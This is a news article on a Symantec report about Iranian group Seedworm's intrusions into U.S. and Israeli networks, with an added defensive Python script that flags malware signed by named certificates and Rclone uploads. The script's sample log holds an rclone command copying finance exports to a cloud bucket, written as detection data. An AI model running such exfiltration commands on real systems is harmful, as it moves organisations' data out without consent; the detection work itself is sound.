Symantec reports Iranian Seedworm hackers infiltrate US infrastructure and defense supply chain networks


Symantec researchers identified cyber activity linked to the Iranian advanced persistent threat group Seedworm across the networks of several U.S. organizations, with intrusions beginning in early February 2026 and continuing in recent days. The activity has affected a range of sectors, including a U.S. bank, an airport, non-governmental organizations in the U.S. and Canada, and the Israeli operations of a U.S. software company that supplies the defense and aerospace industries.

The campaign has emerged amid escalating regional tensions following U.S. and Israeli military strikes on Iran, raising concerns that Iran-aligned cyber actors may be expanding reconnaissance and access operations against Western organizations. Security analysts warn that the activity signals a broader effort to establish footholds in strategically relevant networks, and they advise organizations to increase monitoring and defensive readiness as Iranian threat groups may continue probing targets in the coming weeks.

“Seedworm is a long-standing Iranian threat group, which usually mounts classic espionage attacks for the purposes of spying and information gathering,” according to a Thursday post by the Symantec and Carbon Black Threat Hunter team. “Active since 2017, CISA has said that Seedworm is ‘a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).’ Seedworm originally focused on victims in the Middle East but later broadened its scope to target telecommunications, defense, local government, and oil and natural gas organizations in Asia, Africa, Europe, and North America. The group develops its own custom malware as well as using dual-use and living off the land tools.”

The team added that “Given the current escalations between the U.S. and Iran, it is likely that CNI is at high risk of attack, as well as organizations supporting these entities. Organizations with exposed terminal operating systems, schedules and trucking/rail interfaces may be targeted, as well as passenger processing systems, baggage systems, and contractor networks. Additionally, given the high risk, other organizations that operate within sectors such as energy/fuel supply chains may be targets.” 

Researchers identified a previously unknown backdoor, which they named Dindoor, on the network of the Israeli branch of the targeted software company. The same backdoor was also detected on the networks of a U.S. bank and a Canadian non-profit organization. Dindoor leverages Deno, a secure runtime environment for JavaScript and TypeScript, to execute its payload and was digitally signed with a certificate issued to ‘Amy Cherne.’

Investigators also observed an attempted data exfiltration from the software company using Rclone, a command line tool often abused to move data to cloud storage. The transfer appeared to target a Wasabi cloud storage bucket, though it remains unclear whether the exfiltration was successful.

A separate Python-based backdoor, called Fakeset, was discovered on the networks of a U.S. airport and a non-profit organization. This malware was signed with certificates issued to ‘Amy Cherne’ and ‘Donald Gay.’ The Donald Gay certificate has previously been used to sign malware linked to the Seedworm group. The backdoor was downloaded from two servers hosted by Backblaze cloud storage.

The same Donald Gay certificate was also used to sign samples from a malware family known as Stagecomp, which is designed to deploy the Darkcomp backdoor. Both Stagecomp and Darkcomp have previously been attributed to Seedworm by security vendors, including Google, Microsoft, and Kaspersky. Although these specific malware families were not observed in the recent intrusions, the reuse of the same signing certificates strongly suggests that the activity targeting the U.S. organizations is linked to the Seedworm threat actor.

While it remains unclear whether Seedworm’s operations have been disrupted by the current regional conflict, the group’s existing footholds in U.S. and Israeli networks before the escalation place it in a potentially dangerous position to launch further attacks. Although some of the identified breaches have been contained, researchers warn that other organizations could still face exposure if similar access remains undetected.

Symantec assessed that critical infrastructure organizations and companies supporting military logistics could face cyberattacks aimed at compromising several key systems. These include operational technology interfaces, scheduling and logistics platforms, contractor networks, and remote management systems that control or support infrastructure operations.

Security teams are advised to closely monitor for abnormal access to industrial control systems, unexpected remote connections to operational networks, authentication attempts targeting infrastructure management platforms, and unusual configuration changes in critical systems. Increased scrutiny of vendor access and contractor networks is also recommended.

At a minimum, organizations should implement strong network segmentation across operational technology environments and restrict remote access to infrastructure systems. They should also closely monitor contractor VPN access and maintain offline backups of critical configuration systems to ensure resilience in the event of a compromise.
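The report gives defenders two concrete pivots: malware signed with certificates issued to the subjects ‘Amy Cherne’ and ‘Donald Gay’, and Rclone being used to push data to a cloud storage bucket. The following Python script is an added example, not Symantec's tooling or anything from the report, showing how a security team could sweep endpoint process telemetry for both indicators. The log format (pipe-delimited `ts|host|image|cmdline|signer`), the hostnames, the bucket name and all sample lines are constructed for the demo; the signer subjects are the ones named in the report.

```python
"""Triage constructed endpoint telemetry for two indicators from the Symantec
Seedworm report: binaries whose Authenticode signer subject matches a named
certificate, and rclone invocations whose destination is a cloud remote.

Added example; the log format, hosts and sample lines are assumptions."""
import re
from dataclasses import dataclass

# Certificate subjects the report names as signers of Seedworm-linked malware.
WATCHED_SIGNERS = {"amy cherne", "donald gay"}

# rclone sub-commands that transfer data; a "remote:path" destination is what
# separates a cloud upload from ordinary local file handling.
RCLONE_TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# Remote names need 2+ characters so a Windows drive letter ("C:\...") is not
# mistaken for an rclone remote.
REMOTE_ARG = re.compile(r"^[A-Za-z0-9_\-]{2,}:\S*$")


@dataclass
class Event:
    ts: str
    host: str
    image: str
    cmdline: str
    signer: str          # Authenticode signer subject, "" when unsigned


@dataclass
class Finding:
    host: str
    reason: str
    evidence: str


def parse_log(text: str) -> list:
    """Parse constructed 'ts|host|image|cmdline|signer' lines (assumed format)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, image, cmdline, signer = line.split("|", 4)
        events.append(Event(ts, host, image, cmdline, signer.strip()))
    return events


def signer_is_watched(signer: str) -> bool:
    """Case-insensitive match against the signer subjects named in the report."""
    return signer.strip().lower() in WATCHED_SIGNERS


def rclone_remote_target(cmdline: str):
    """Return the remote destination of an rclone transfer, or None.

    Flags are assumed to be written as --flag=value so that the remaining
    positional arguments are exactly: verb, source, destination."""
    parts = cmdline.split()
    if not parts:
        return None
    exe = re.split(r"[\\/]", parts[0])[-1].lower()
    if exe not in ("rclone", "rclone.exe"):
        return None
    positional = [p for p in parts[1:] if not p.startswith("-")]
    if len(positional) < 3 or positional[0].lower() not in RCLONE_TRANSFER_VERBS:
        return None
    dest = positional[-1]
    return dest if REMOTE_ARG.match(dest) else None


def triage(events) -> list:
    """Apply both indicator checks to every event and collect findings."""
    findings = []
    for e in events:
        if signer_is_watched(e.signer):
            findings.append(Finding(e.host, "binary signed by watched certificate subject",
                                    f"{e.image} signer={e.signer!r}"))
        dest = rclone_remote_target(e.cmdline)
        if dest:
            findings.append(Finding(e.host, "rclone transfer to cloud remote", dest))
    return findings


# Constructed sample telemetry: one rclone upload to a cloud remote, one benign
# rclone local sync, two binaries signed by the watched subjects, one benign.
SAMPLE_LOG = r"""
2026-02-12T09:14:02Z|ws-fin-01|C:\Tools\rclone.exe|C:\Tools\rclone.exe copy C:\Finance\exports wasabi:acme-backups/exports --config=C:\Users\svc\rclone.conf|
2026-02-12T09:15:10Z|ws-fin-01|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs|Microsoft Windows
2026-02-12T10:02:44Z|ws-eng-07|C:\ProgramData\update\update.exe|update.exe --silent|Amy Cherne
2026-02-12T10:30:00Z|ws-it-02|C:\Tools\rclone.exe|rclone.exe sync D:\backup E:\mirror|
2026-02-12T11:41:19Z|srv-app-03|C:\Users\Public\svc.exe|svc.exe|Donald Gay
"""

if __name__ == "__main__":
    for f in triage(parse_log(SAMPLE_LOG)):
        print(f"{f.host}: {f.reason} ({f.evidence})")
```

The signer check is deliberately exact-subject rather than substring, since common first or last names would otherwise produce noise; in a real deployment the match would be extended to certificate thumbprints once they are known. The rclone rule keys on the destination argument, so the same check would surface uploads to any configured remote, not only the Wasabi bucket mentioned in the report.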

Recent activity from Iran-aligned cyber groups highlights a mix of hacktivism, espionage, and disruptive operations targeting Israel, the United States, and regional organizations. The Iranian-aligned hacktivist group Handala has conducted attacks since at least 2024 against Israeli organizations and entities perceived to support Israel. Its operations include phishing, data theft, ransomware, extortion, and destructive attacks using custom wipers, with stolen data often published on a dedicated leak site. The group has also promoted its activity on Telegram and X. 

In late 2025 and early 2026, Handala claimed several high-profile breaches, including alleged compromises involving Israeli officials, a major Israeli healthcare network, and energy sector companies such as Sharjah National Oil Corporation and Israel Opportunity Energy. Some claims, including an alleged breach of Saudi Aramco, appear exaggerated or based on previously circulating data, suggesting potential information or psychological operations aimed at generating attention and reputational damage.

Iranian APT group Seedworm has also continued espionage-focused operations. In October 2025, the group launched a spear phishing campaign using a compromised mailbox to distribute a custom backdoor known as Phoenix to more than 100 government entities and international organizations across the Middle East and North Africa. The campaign relied on malicious Office attachments and infrastructure hosting remote access tools and credential stealers to enable persistent access and intelligence collection. In a separate campaign between June and August 2025, the group targeted academics and foreign policy experts, impersonating a senior researcher from the Brookings Institution to deliver malicious links and remote access payloads.

Other Iranian-linked actors have conducted reconnaissance and disruptive activity as well. The group Marshtreader, associated with Iran’s Ministry of Intelligence and Security, was observed in June 2025 scanning Israeli networks for vulnerable cameras, likely to support intelligence gathering and potential targeting during the regional conflict. 

Additional attacks included password spraying against Israeli municipal government entities and spear phishing campaigns designed to deliver remote access tools. Meanwhile, the pro-Palestine hacktivist group DieNet launched high-volume distributed denial of service attacks against U.S. critical infrastructure sectors, including energy, finance, healthcare, and transportation, using amplification techniques and DDoS as a service infrastructure to disrupt operations.

Researchers warn that Iranian cyber actors are likely to launch a mix of disruptive and covert campaigns in the near term. These operations may combine highly visible actions such as distributed denial of service attacks, website defacements, and data leak claims with quieter efforts to gain long term access to targeted networks. The goal would be both political signaling and the creation of strategic leverage against critical sectors.

Defenders should expect increased activity targeting government, transportation, energy, defense contractors, and related supply chains. Tactics will likely include DDoS attacks, credential harvesting, password spraying, and mailbox compromises to gain initial access and intelligence. Hacktivist groups may also amplify pressure through leak sites and intimidation campaigns, even when the underlying breaches are limited, using these claims to create psychological and reputational impact.
